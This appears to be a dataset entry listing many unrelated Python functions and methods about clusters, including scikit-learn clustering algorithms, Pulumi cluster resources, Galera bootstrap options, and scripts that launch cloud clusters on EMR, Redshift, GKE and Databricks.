cluster.Birch(n_clusters=num_clusters)\n two_means = cluster.MiniBatchKMeans(n_clusters=num_clusters,\n random_state=self.args['seed'])\n average_linkage = cluster.AgglomerativeClustering(linkage=\"average\", \n n_clusters=num_clusters)\n hdbsc = hdbscan.HDBSCAN(min_cluster_size=10)\n kmeans = cluster.KMeans(n_clusters=num_clusters, random_state=self.args['seed'])\n dbscan = 
cluster.DBSCAN()\n \n self.clustering_algorithms = {\n 'MiniBatchKMeans': two_means,\n 'AffinityPropagation': affinity_propagation,\n 'MeanShift': ms,\n 'SpectralClustering': spectral,\n 'Ward': ward,\n 'AgglomerativeClustering': average_linkage,\n 'DBSCAN': dbscan,\n 'Birch': birch,\n 'HDBSCAN': hdbsc,\n 'KMeans': kmeans\n }", "def get_cluster(self,cluster_name,project_id=''):\n print( f'>>>>>>{self.project_id}')\n if project_id == '':\n project_id = self.project_id\n return self.get('{}/groups/{}/clusters/{}'.format(ApiVersion.A1.value,project_id,cluster_name))", "def __str__(self):\n return \"Clustering\"", "def parse():\n intro = \"\"\"\\\n Use this script to bootstrap, join nodes within a Galera Cluster\n ----------------------------------------------------------------\n Avoid joining more than one node at once!\n \"\"\"\n parser = argparse.ArgumentParser(\n formatter_class=lambda prog:\n argparse.RawDescriptionHelpFormatter(prog, max_help_position=29),\n description=textwrap.dedent(intro),\n epilog=\"Author: Massimiliano Adamo <maxadamo@gmail.com>\")\n parser.add_argument(\n '-cg', '--check-galera', help='check if all nodes are healthy',\n action='store_true', dest='Cluster(None, None).checkonly()',\n required=False)\n parser.add_argument(\n '-dr', '--dry-run', help='show SQL statements to run on this cluster',\n action='store_true', dest='Cluster(None, None).show_statements()',\n required=False)\n parser.add_argument(\n '-je', '--join-existing', help='join existing Cluster',\n action='store_true',\n dest='Cluster(\"existing\", \"existing\").joincluster()', required=False)\n parser.add_argument(\n '-be', '--bootstrap-existing', help='bootstrap existing Cluster',\n action='store_true', dest='Cluster(None, \"existing\").createcluster()',\n required=False)\n parser.add_argument(\n '-jn', '--join-new', help='join new Cluster', action='store_true',\n dest='Cluster(\"new\", \"new\").joincluster()', required=False)\n parser.add_argument(\n '-bn', '--bootstrap-new', action='store_true',\n help='bootstrap new Cluster',\n dest='Cluster(None, \"new\").createcluster()', required=False)\n parser.add_argument(\n '-f', '--force', action='store_true',\n help='force bootstrap new or join new Cluster', required=False)\n\n return parser.parse_args()", "def main():\n parser = argparse.ArgumentParser(description=\"Wrapper of the scikit-learn AgglomerativeClustering method. \", formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=99999))\n parser.add_argument('--config', required=False, help='Configuration file')\n\n # Specific args of each building block\n required_args = parser.add_argument_group('required arguments')\n required_args.add_argument('--input_dataset_path', required=True, help='Path to the input dataset. Accepted formats: csv.')\n required_args.add_argument('--output_results_path', required=True, help='Path to the clustered dataset. Accepted formats: csv.')\n parser.add_argument('--output_plot_path', required=False, help='Path to the clustering plot. 
Accepted formats: png.')\n\n args = parser.parse_args()\n args.config = args.config or \"{}\"\n properties = settings.ConfReader(config=args.config).get_prop_dic()\n\n # Specific call of each building block\n agglomerative_clustering(input_dataset_path=args.input_dataset_path,\n output_results_path=args.output_results_path,\n output_plot_path=args.output_plot_path,\n properties=properties)", "def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def is_sklearn_clusterer(obj):\n return is_sklearn_estimator(obj) and sklearn_scitype(obj) == \"clusterer\"", "def createCluster(method, n_clust=3, min_samples=5):\n if method == 'SpectralClustering':\n clust = SpectralClustering(n_clusters=n_clust)\n clust.fit(PC)\n scat = plt.scatter(-100, -100, zorder=2)\n elif method == 'OPTICS':\n clust = OPTICS(min_samples=min_samples)\n clust.fit(PC)\n scat = plt.scatter(PC[clust.labels_ == -1, 0],\n PC[clust.labels_ == -1, 1], c='k')\n return clust, scat", "def kozakov2015(*args, **kwargs):\n clusters = []\n for sel in args:\n cluster = Cluster(\"\", sel, pm.get_coords(sel))\n clusters.append(cluster)\n\n ensemble = Kozakov2015Ensemble(clusters)\n print(\n textwrap.dedent(\n f\"\"\"\n {ensemble}\n Class {ensemble.klass}\n S {ensemble.strength}\n S0 {ensemble.strength0}\n CD {ensemble.max_center_to_center}\n MD {ensemble.max_dist}\n \"\"\"\n )\n )", "def __str__(self):\n return \"Cluster\"", "def generate_cluster_stack_name(job):\n return 'cluster-%s----%s' % (job.compute_resource.id, job.id)", "def _setup_test_cluster(self, return_cluster, name, create_args):\n stack_name = '{0}_stack'.format(name)\n templ, self.stack = self._setup_test_stack(stack_name, TEMPLATE)\n cluster_instance = cbd.CloudBigData('%s_name' % name,\n templ.resource_definitions(\n self.stack)['cbd_cluster'],\n self.stack)\n self._stubout_create(return_cluster)\n return cluster_instance", "def get_cluster(self) -> 'AioCluster':\n return AioCluster(self)", "def create_cluster(self, name, cluster_type, params, ssh_key, *args, **kwargs):\n raise NotImplementedError", "def create_cluster(module, switch_list):\n global CHANGED_FLAG\n output = ''\n new_cluster = False\n\n node1 = switch_list[0]\n node2 = switch_list[1]\n\n name = node1 + '-' + node2 + '-cluster'\n\n cli = pn_cli(module)\n cli += ' switch %s cluster-show format name no-show-headers ' % node1\n cluster_list = run_cli(module, cli)\n\n if cluster_list is not None:\n cluster_list = cluster_list.split()\n if name not in cluster_list:\n new_cluster = True\n\n if new_cluster or cluster_list is None:\n cli = pn_cli(module)\n cli += ' switch %s cluster-create name %s ' % (node1, name)\n cli += ' cluster-node-1 %s cluster-node-2 %s ' % (node1, node2)\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created cluster %s\\n' % (node1, name)\n\n return output", "def get_cluster_def():\n if settings.NO_OP:\n return None\n\n ensure_in_custer()\n\n cluster = os.getenv('POLYAXON_CLUSTER', None)\n try:\n return json.loads(cluster) if cluster else None\n except (ValueError, TypeError):\n print('Could get cluster definition, '\n 'please make sure this is running inside a polyaxon job.')\n return None", "def main():\n if sys.argv[1] == \"start\":\n 
start_cluster(sys.argv[2], sys.argv[3], int(sys.argv[4]),\n int(sys.argv[5]), sys.argv[6], sys.argv[7],\n int(sys.argv[8]))\n elif sys.argv[1] == \"stop\":\n stop_cluster()\n else:\n print 'Unknown Option'", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = ClusterArgs.__new__(ClusterArgs)\n\n __props__.__dict__[\"allocation_state\"] = None\n __props__.__dict__[\"allocation_state_transition_time\"] = None\n __props__.__dict__[\"creation_time\"] = None\n __props__.__dict__[\"current_node_count\"] = None\n __props__.__dict__[\"errors\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"node_setup\"] = None\n __props__.__dict__[\"node_state_counts\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"provisioning_state_transition_time\"] = None\n __props__.__dict__[\"scale_settings\"] = None\n __props__.__dict__[\"subnet\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"user_account_settings\"] = None\n __props__.__dict__[\"virtual_machine_configuration\"] = None\n __props__.__dict__[\"vm_priority\"] = None\n __props__.__dict__[\"vm_size\"] = None\n return Cluster(resource_name, opts=opts, __props__=__props__)", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n cluster_id: Optional[pulumi.Input[str]] = None,\n identity: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityArgs']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n size_gb: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ClusterState.__new__(_ClusterState)\n\n __props__.__dict__[\"cluster_id\"] = cluster_id\n __props__.__dict__[\"identity\"] = identity\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"size_gb\"] = size_gb\n __props__.__dict__[\"tags\"] = tags\n return Cluster(resource_name, opts=opts, __props__=__props__)", "def _initialize_cluster(filename):\n\tstar_cluster = cluster.Cluster(filename)\n\tprint(\"\\nYour star cluster is being created ...\")\n\tstar_cluster.populate_celestials()\n\treturn star_cluster", "def main():\n rs = redshift(config_file=CONFIG_FILENAME)\n \n # check if cluster already available\n try:\n clust_avail = check_available(rs)\n except rs_client.exceptions.ClusterNotFoundFault:\n clust_avail = False\n\n # if cluster not available, create it\n if not clust_avail:\n create_cluster(rs) \n \n print(f'Cluster is available. 
Cluster information: \\n{rs.get_cluster_info()}')", "def launch_cluster(**overrides) -> dict:\n if os.path.isfile(META_FILE):\n raise FileExistsError(\"Cluster already exists!\")\n\n config = DEFAULT_CONFIG.copy()\n config.update(**overrides)\n\n sg = make_sg()\n config[\"Instances\"].update(AdditionalMasterSecurityGroups=[sg.id])\n emr = get_emr_client()\n\n response = emr.run_job_flow(**config)\n cluster_id = response[\"JobFlowId\"]\n master_addr = wait_init(cluster_id)\n\n meta = {\n \"MasterNodeAddr\": master_addr,\n \"ClusterId\": cluster_id,\n \"SGId\": sg.id\n }\n with open(META_FILE, \"w\") as f:\n json.dump(meta, f)\n\n print(\"INFO: Cluster Launched!\")\n return meta", "def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")", "def _Clustered(self):\n def cluster_func(symbol):\n name = symbol.full_name\n if not name or symbol.IsStringLiteral():\n # min_count=2 will ensure order is maintained while not being grouped.\n # \"&\" to distinguish from real symbol names, id() to ensure uniqueness.\n name = '&' + hex(id(symbol))\n elif name.startswith('*'):\n # \"symbol gap 3\" -> \"symbol gaps\"\n name = re.sub(r'\\s+\\d+( \\(.*\\))?$', 's', name)\n # Never cluster symbols that span multiple paths so that all groups return\n # non-None path information.\n diff_status = None\n if symbol.IsDelta():\n diff_status = symbol.diff_status\n if symbol.object_path or symbol.full_name.startswith('**'):\n return (symbol.object_path, name, diff_status)\n return (symbol.address, name, diff_status)\n\n # Use a custom factory to fill in name & template_name.\n def group_factory(token, symbols):\n full_name = token[1]\n sym = symbols[0]\n if token[1].startswith('*'):\n return self._CreateTransformed(symbols,\n full_name=full_name,\n template_name=full_name,\n name=full_name,\n section_name=sym.section_name)\n return self._CreateTransformed(symbols,\n full_name=full_name,\n template_name=sym.template_name,\n name=sym.name,\n section_name=sym.section_name)\n\n # A full second faster to cluster per-section. 
Plus, don't need create\n # (section_name, name) tuples in cluster_func.\n ret = []\n for section in self.GroupedByContainerAndSectionName():\n ret.extend(section.GroupedBy(\n cluster_func, min_count=2, group_factory=group_factory))\n\n return self._CreateTransformed(ret)", "def __init__(self, messageHandler, **kwargs):\n Segments.__init__(self, messageHandler, **kwargs)\n self.printTag = 'Clustered ROM'\n self._divisionClassifier = None # Classifier to cluster subdomain ROMs\n self._metricClassifiers = None # Metrics for clustering subdomain ROMs\n self._clusterInfo = {} # contains all the useful clustering results\n self._evaluationMode = 'truncated' # TODO make user option, whether returning full histories or truncated ones\n self._featureTemplate = '{target}|{metric}|{id}' # created feature ID template\n\n # check if ROM has methods to cluster on (errors out if not)\n if not self._templateROM.isClusterable():\n self.raiseAnError(NotImplementedError, 'Requested ROM \"{}\" does not yet have methods for clustering!'.format(self._romName))", "def initFromCLI(cls, name=None):\n ap = cls._makeArgumentParser()\n ns = ap.parse_args()\n instance = cls.initFromOptions(ns, name=name)\n return instance", "def find_cluster_type(self, name):\n raise NotImplementedError", "def get_cluster_index(function_name, dataset_name):\n X, y = data_loader.load_dataset(dataset_name)\n if function_name == 'davies_bouldin':\n return davies_bouldin(X, y), 'min'\n else:\n return xie_beni(X, y), 'min'", "def launch_cluster(params):\n logging.info('Launching cluster of size: {} and type: {}'.format(params.cluster_size, params.instance_type))\n subprocess.check_call(['cgcloud',\n 'create-cluster',\n '--leader-instance-type', 'm3.medium',\n '--instance-type', params.instance_type,\n '--share', params.shared_dir,\n '--num-workers', str(params.cluster_size),\n '-c', params.cluster_name,\n '--spot-bid', str(params.spot_price),\n '--leader-on-demand',\n '--ssh-opts',\n '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no',\n 'toil'])", "def cluster_start(args: Namespace, configuration: BareConfig):\n logging.basicConfig(level=logging.DEBUG,\n datefmt='%m-%d %H:%M')\n launch_orchestrator(args=args, conf=configuration)", "def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL", "def get_cluster(self, label):\n try:\n return self._clusters[label]\n except KeyError:\n return None", "def cluster_name(self):\n return self.name", "def create_cluster(ctx, project_name, cluster_name, instance_size_name):\n project = ctx.obj.groups.byName[project_name].get().data\n\n cluster_config = {\n 'name': cluster_name,\n 'clusterType': 'REPLICASET',\n 'providerSettings': {\n 'providerName': 'AWS',\n 'regionName': 'US_WEST_1',\n 'instanceSizeName': instance_size_name}}\n\n cluster = ctx.obj.groups[project.id].clusters.post(**cluster_config)\n pprint(cluster.data)", "def _create_cluster(self, server_instance):\n return Cluster([server_instance])", "def get_clustering_algorithm_class(cls):\n return {\n \"spectral\": SpectralClusteringAlgorithm,\n \"dbscan\": DBSCANAlgorithm,\n \"gromos\": GromosAlgorithm,\n \"kmedoids\": KMedoidsAlgorithm,\n \"random\": RandomClusteringAlgorithm,\n \"hierarchical\": HierarchicalClusteringAlgorithm\n }", "def makeClustering(data, x_scaled, coef, random_s=42, algo='kmeans', epsilon=0.5):\n #Random seed fix\n np.random.seed(random_s)\n #Check if the input user on 
algo variable is in our list\n algos = ['kmeans', 'hierarchical', 'db_scan']\n if algo not in algos:\n raise ValueError(\"Algorithme pas bon. Voici la liste dispo: %s\" % algos)\n #if kmeans :\n if algo == 'kmeans':\n try:\n clust = coef.iloc[0, 0] #If nbr_clust comes from the silhouette's function\n except AttributeError:\n clust = coef #if it's from user's input\n data_clust = clustering.kmeansClustering(data, x_scaled, clust, random_s)\n #If hierarchical clustering\n if algo == 'hierarchical':\n print('Still in build, use kmeans or db_scan for now')\n #If DB_SCAN\n if algo == 'db_scan':\n data_clust = clustering.db_scanClustering(data, x_scaled, random_s, epsilon, coef)\n return data_clust", "def cluster_by_partitioning(active_sites):\n cls, sc = k_means(active_sites)\n\n return cls", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_name\")", "def __init__(self: AutoScalingCluster,\n source: Iterable[str] = None,\n num_tasks: int = 1,\n template: str = DEFAULT_TEMPLATE,\n bundlesize: int = DEFAULT_BUNDLESIZE,\n bundlewait: int = DEFAULT_BUNDLEWAIT,\n bind: Tuple[str, int] = ('0.0.0.0', QueueConfig.port),\n delay_start: float = DEFAULT_DELAY,\n launcher: str = DEFAULT_AUTOSCALE_LAUNCHER,\n launcher_args: List[str] = None,\n remote_exe: str = 'hyper-shell',\n max_retries: int = DEFAULT_ATTEMPTS,\n eager: bool = False,\n redirect_failures: IO = None,\n capture: bool = False,\n policy: str = DEFAULT_AUTOSCALE_POLICY,\n period: int = DEFAULT_AUTOSCALE_PERIOD,\n factor: float = DEFAULT_AUTOSCALE_FACTOR,\n init_size: int = DEFAULT_AUTOSCALE_INIT_SIZE,\n min_size: int = DEFAULT_AUTOSCALE_MIN_SIZE,\n max_size: int = DEFAULT_AUTOSCALE_MAX_SIZE,\n forever_mode: bool = False, # noqa: ignored (passed by ClusterApp)\n restart_mode: bool = False, # noqa: ignored (passed by ClusterApp)\n in_memory: bool = False, # noqa: ignored (passed by ClusterApp)\n no_confirm: bool = False, # noqa: ignored (passed by ClusterApp)\n client_timeout: int = None,\n task_timeout: int = None\n ) -> None:\n auth = secrets.token_hex(64)\n self.server = ServerThread(source=source, auth=auth, bundlesize=bundlesize, bundlewait=bundlewait,\n max_retries=max_retries, eager=eager, address=bind, forever_mode=True,\n redirect_failures=redirect_failures)\n launcher_args = '' if launcher_args is None else ' '.join(launcher_args)\n client_args = '' if not capture else '--capture'\n if client_timeout is not None:\n client_args += f' -T {client_timeout}'\n if task_timeout is not None:\n client_args += f' -W {task_timeout}'\n launcher = (f'{launcher} {launcher_args} {remote_exe} client -H {HOSTNAME} -p {bind[1]} '\n f'-N {num_tasks} -b {bundlesize} -w {bundlewait} -t \"{template}\" -k {auth} '\n f'-d {delay_start} {client_args}')\n self.autoscaler = AutoScalerThread(policy=policy, factor=factor, period=period,\n init_size=init_size, min_size=min_size, max_size=max_size,\n launcher=launcher)\n super().__init__(name='hypershell-cluster')", "def getClusterJob(pool, sample=None, chrom=None): \r\n if sample != None:\r\n if sample not in clusterJobs:\r\n clusterJobs[sample] = 
ClusterJob(sample.outputDir + sample.libName + \"Job.sh\")\r\n return clusterJobs[sample]\r\n elif chrom != None:\r\n if chrom not in clusterJobs:\r\n clusterJobs[chrom] = ClusterJob(pool.outputDir + chrom +\"_\" + pool.poolName + \"Job.sh\")\r\n return clusterJobs[chrom]\r\n clusterJobs[pool] = ClusterJob(pool.outputDir + pool.poolName + \"Job.sh\")\r\n return clusterJobs[pool]", "def get_cluster_name():\n cookiecutter_path = Path(\"cookiecutter.json\")\n cookiecutter_dict = json.loads(cookiecutter_path.read_text())\n cluster_name = \"\"\n try:\n cluster_name = cookiecutter_dict[\"cluster_name\"]\n except KeyError:\n while not cluster_name:\n cluster_name = input(\"Please insert the cluster name: \")\n finally:\n cookiecutter_dict[\"cluster_name\"] = cluster_name\n cookiecutter_path.write_text(json.dumps(cookiecutter_dict, indent=2))\n return cluster_name", "def get_coe_cluster(self, name_or_id, filters=None):\n return _utils._get_entity(self, 'coe_cluster', name_or_id, filters)", "def __init__(__self__, resource_name, opts=None, enabled_cluster_log_types=None, name=None, role_arn=None, tags=None, version=None, vpc_config=None, __props__=None, __name__=None, __opts__=None):\n if __name__ is not None:\n warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning)\n resource_name = __name__\n if __opts__ is not None:\n warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning)\n opts = __opts__\n if opts is None:\n opts = pulumi.ResourceOptions()\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n if opts.version is None:\n opts.version = utilities.get_version()\n if opts.id is None:\n if __props__ is not None:\n raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')\n __props__ = dict()\n\n __props__['enabled_cluster_log_types'] = enabled_cluster_log_types\n __props__['name'] = name\n if role_arn is None:\n raise TypeError(\"Missing required property 'role_arn'\")\n __props__['role_arn'] = role_arn\n __props__['tags'] = tags\n __props__['version'] = version\n if vpc_config is None:\n raise TypeError(\"Missing required property 'vpc_config'\")\n __props__['vpc_config'] = vpc_config\n __props__['arn'] = None\n __props__['certificate_authority'] = None\n __props__['created_at'] = None\n __props__['endpoint'] = None\n __props__['identities'] = None\n __props__['platform_version'] = None\n __props__['status'] = None\n super(Cluster, __self__).__init__(\n 'aws:eks/cluster:Cluster',\n resource_name,\n __props__,\n opts)", "def create_cluster():\n config = get_kube_config()\n command = CLUSTER_CREATE_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n machine_type=config['machine_type'],\n disk_size=config['disk_size'],\n nodes=config['nodes'],\n zone=config['zone'])\n print \"Creating cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))\n command = AUTH_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n zone=config['zone'])\n print \"Authenticating with cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))", "def run_example_cluster_cmd(example_module_name, example_argv):\n run_example_cluster(example_module_name, example_argv)", "def launch_cluster(self):\n version = self.get_latest_spark_version()\n import os\n 
real_path = os.path.dirname(os.path.realpath(__file__))\n if self.is_aws():\n with open(real_path+'/../data/aws_cluster.json', 'r') as fp:\n cluster_json = json.loads(fp.read())\n else:\n with open(real_path+'/../data/azure_cluster.json', 'r') as fp:\n cluster_json = json.loads(fp.read())\n # set the latest spark release regardless of defined cluster json\n cluster_json['spark_version'] = version['key']\n c_info = self.post('/clusters/create', cluster_json)\n self.wait_for_cluster(c_info['cluster_id'])\n return c_info['cluster_id']", "def Run(self, args):\n client = api_util.AlloyDBClient(self.ReleaseTrack())\n alloydb_client = client.alloydb_client\n alloydb_messages = client.alloydb_messages\n cluster_ref = client.resource_parser.Create(\n 'alloydb.projects.locations.clusters',\n projectsId=properties.VALUES.core.project.GetOrFail,\n locationsId=args.region, clustersId=args.cluster)\n req = alloydb_messages.AlloydbProjectsLocationsClustersGetRequest(\n name=cluster_ref.RelativeName()\n )\n cluster = alloydb_client.projects_locations_clusters.Get(req)\n normalize_automated_backup_policy(cluster.automatedBackupPolicy)\n return cluster", "def __init__(self, rank=10, clusters=1, iterations=3, metric='euclidean'):\n\n sk_kmeans.__init__(self, n_clusters=clusters, max_iter=iterations)\n # Cluster ranks is a list of lists of knn sorted elements for each cluster w.r.t. the cluster mean\n self.rank = rank\n self.metric = metric", "def generate_cluster_name():\n ADJECTIVES = (\n \"autumn\", \"hidden\", \"bitter\", \"misty\", \"silent\", \"empty\", \"dry\", \"dark\",\n \"summer\", \"icy\", \"quiet\", \"white\", \"cool\", \"winter\", \"quick\",\n \"patient\", \"twilight\", \"crimson\", \"wispy\", \"weathered\", \"blue\",\n \"broken\", \"cold\", \"damp\", \"falling\", \"frosty\", \"green\",\n \"lingering\", \"bold\", \"little\", \"morning\", \"muddy\", \"old\",\n \"red\", \"rough\", \"still\", \"small\", \"sparkling\", \"tasty\", \"shy\",\n \"wandering\", \"withered\", \"wild\", \"black\", \"mellow\" \"holy\", \"solitary\",\n \"snowy\", \"proud\", \"floral\", \"restless\", \"divine\",\n \"ancient\", \"purple\", \"lively\", \"nameless\", \"tossed\"\n )\n\n ANIMAL_NOUNS = (\n \"alligators\", \"crocodiles\", \"ants\", \"antelopes\", \"badgers\", \"bees\",\n \"buffalos\", \"butterflies\", \"cheetahs\", \"coyotes\", \"dolphins\", \"elephants\",\n \"foxes\", \"giraffes\", \"gorillas\", \"hedgehogs\", \"hornets\", \"hyenas\", \"jackals\",\n \"kangaroos\", \"leopards\", \"lions\", \"lizards\", \"mammoths\", \"porcupines\",\n \"rabbits\", \"racoons\", \"rhinos\", \"sharks\", \"snails\", \"snakes\", \"spiders\",\n \"squirrels\", \"tigers\", \"wasps\", \"whales\", \"wolves\", \"wombats\", \"zebras\", \"salad\"\n )\n\n return u\"%s %s\" % (random.choice(ADJECTIVES), random.choice(ANIMAL_NOUNS), )", "def main():\n parser = argparse.ArgumentParser(description=main.__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('--config', required=True, help='Configuration file for run. Must be in shared_dir')\n parser.add_argument('-c', '--cluster_size', required=True, help='Number of workers desired in the cluster.')\n parser.add_argument('-s', '--sample_size', required=True, type=float, help='Size of the sample deisred in TB.')\n parser.add_argument('-t', '--instance_type', default='c3.8xlarge', help='e.g. 
m4.large or c3.8xlarge.')\n parser.add_argument('-n', '--cluster_name', required=True, help='Name of cluster.')\n parser.add_argument('--namespace', default='jtvivian', help='CGCloud NameSpace')\n parser.add_argument('--spot_price', default=0.60, help='Change spot price of instances')\n parser.add_argument('-b', '--bucket', default='tcga-data-cgl-recompute', help='Bucket where data is.')\n parser.add_argument('-d', '--shared_dir', required=True,\n help='Full path to directory with: pipeline script, launch script, config, and master key.')\n params = parser.parse_args()\n\n # Run sequence\n start = time.time()\n # Get number of samples from config\n with open(params.config, 'r') as f:\n num_samples = len(f.readlines())\n # Launch cluster and pipeline\n uuid = fix_launch(params)\n launch_cluster(params)\n ids = get_instance_ids(filter_cluster=params.cluster_name, filter_name=params.namespace + '_toil-worker')\n launch_pipeline(params)\n # Blocks until all workers are idle\n stop = time.time()\n # Collect metrics from cluster\n collect_metrics(ids, list_of_metrics, start, stop, uuid=uuid)\n # Apply \"Insta-kill\" alarm to every worker\n map(apply_alarm_to_instance, ids)\n # Kill leader\n logging.info('Killing Leader')\n leader_id = get_instance_ids(filter_cluster=params.cluster_name, filter_name=params.namespace + '_toil-leader')[0]\n apply_alarm_to_instance(leader_id, threshold=5)\n # Generate Run Report\n avail_zone = get_avail_zone(filter_cluster=params.cluster_name, filter_name=params.namespace + '_toil-worker')[0]\n total_cost, avg_hourly_cost = calculate_cost(params.instance_type, ids[0], avail_zone)\n # Report values\n output = ['UUID: {}'.format(uuid),\n 'Number of Samples: {}'.format(num_samples),\n 'Number of Nodes: {}'.format(params.cluster_size),\n 'Cluster Name: {}'.format(params.cluster_name),\n 'Source Bucket: {}'.format(params.bucket),\n 'Average Hourly Cost: ${}'.format(avg_hourly_cost),\n 'Cost per Instance: ${}'.format(total_cost),\n 'Availability Zone: {}'.format(avail_zone),\n 'Start Time: {}'.format(datetime.isoformat(datetime.utcfromtimestamp(start))),\n 'Stop Time: {}'.format(datetime.isoformat(datetime.utcfromtimestamp(stop))),\n 'Total Cost of Cluster: ${}'.format(float(total_cost) * int(params.cluster_size)),\n 'Cost Per Sample: ${}'.format((float(total_cost) * int(params.cluster_size) / int(num_samples)))]\n with open(os.path.join(str(uuid) + '_{}'.format(str(datetime.utcnow()).split()[0]), 'run_report.txt'), 'w') as f:\n f.write('\\n'.join(output))\n # You're done!\n logging.info('\\n\\nScaling Test Complete.')", "def create_cluster(df,validate, test, X, k, name):\n \n scaler = StandardScaler(copy=True).fit(df[X])\n X_scaled = pd.DataFrame(scaler.transform(df[X]), columns=df[X].columns.values).set_index([df[X].index.values])\n kmeans = KMeans(n_clusters = k, random_state = 42)\n kmeans.fit(X_scaled)\n kmeans.predict(X_scaled)\n df[name] = kmeans.predict(X_scaled)\n df[name] = 'cluster_' + df[name].astype(str)\n \n v_scaled = pd.DataFrame(scaler.transform(validate[X]), columns=validate[X].columns.values).set_index([validate[X].index.values])\n validate[name] = kmeans.predict(v_scaled)\n validate[name] = 'cluster_' + validate[name].astype(str)\n \n t_scaled = pd.DataFrame(scaler.transform(test[X]), columns=test[X].columns.values).set_index([test[X].index.values])\n test[name] = kmeans.predict(t_scaled)\n test[name] = 'cluster_' + test[name].astype(str)\n \n centroids = pd.DataFrame(scaler.inverse_transform(kmeans.cluster_centers_), columns=X_scaled.columns)\n return 
df, X_scaled, scaler, kmeans, centroids", "def recluster(cluster, min_size, guard, func):\r\n if cluster.get_length() == 0:\r\n return\r\n if cluster.get_length() <= min_size:\r\n return cluster\r\n sim = func(cluster.get_tweets())\r\n if sim < guard:\r\n kmeans = TweetKMeans(2)\r\n kmeans.set_data(cluster.get_tweets())\r\n return kmeans.start_algorithm()\r\n return cluster", "def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])", "def clustering(dataset, logger):\n all_instances = dataset\n meta_dataset = collections.defaultdict(list)\n for instance in all_instances:\n meta_dataset[instance['label']].append(instance['coordinate'])\n\n tasklist = map(\n lambda item, meta_dataset=meta_dataset, logger=logger: (\n item[0],\n clustering_by_label,\n (item[1], item[0], meta_dataset, logger)), meta_dataset.items())\n\n # pool = multiprocessing.pool.Pool(PROCESS_COUNT)\n # clusters = dict(pool.map(map_generate_tuple, tasklist))\n clusters = dict(map(map_generate_tuple, tasklist))\n # pool.close()\n # pool.join()\n\n return clusters", "def load(name):\n\n clovr = pymongo.Connection().clovr\n clusters = clovr.clusters\n instances = clovr.instances\n \n cluster = clusters.find_one(dict(name=name))\n if not cluster:\n raise ClusterDoesNotExist(name)\n\n\n return cluster", "def cluster_spec(num_workers, num_ps):\n cluster = {}\n port = 12222\n\n all_ps = []\n host = '127.0.0.1'\n for _ in range(num_ps):\n all_ps.append(\"{}:{}\".format(host, port))\n port += 1\n cluster['ps'] = all_ps\n\n all_workers = []\n for _ in range(num_workers):\n all_workers.append(\"{}:{}\".format(host, port))\n port += 1\n cluster['worker'] = all_workers\n return cluster", "def _setup_cluster(self):\n raise NotImplementedError('Must be implemented in subclasses.')", "def _create_cluster_from_index(self, index):\n return Cluster(index=index)", "def __init__(\n self,\n name: str,\n path_data: Path,\n path_model: Path,\n clean_f: Callable[..., str] = lambda x: x,\n cluster_thr: float = .9,\n ) -> None:\n self.clean_f = clean_f\n self._name = name\n self._sim_thr = cluster_thr\n self._path_data = path_data\n self._path_model = path_model\n self._clusters: Dict[str, Optional[str]] = {} # Known clusters and labels\n self._clusters_val: 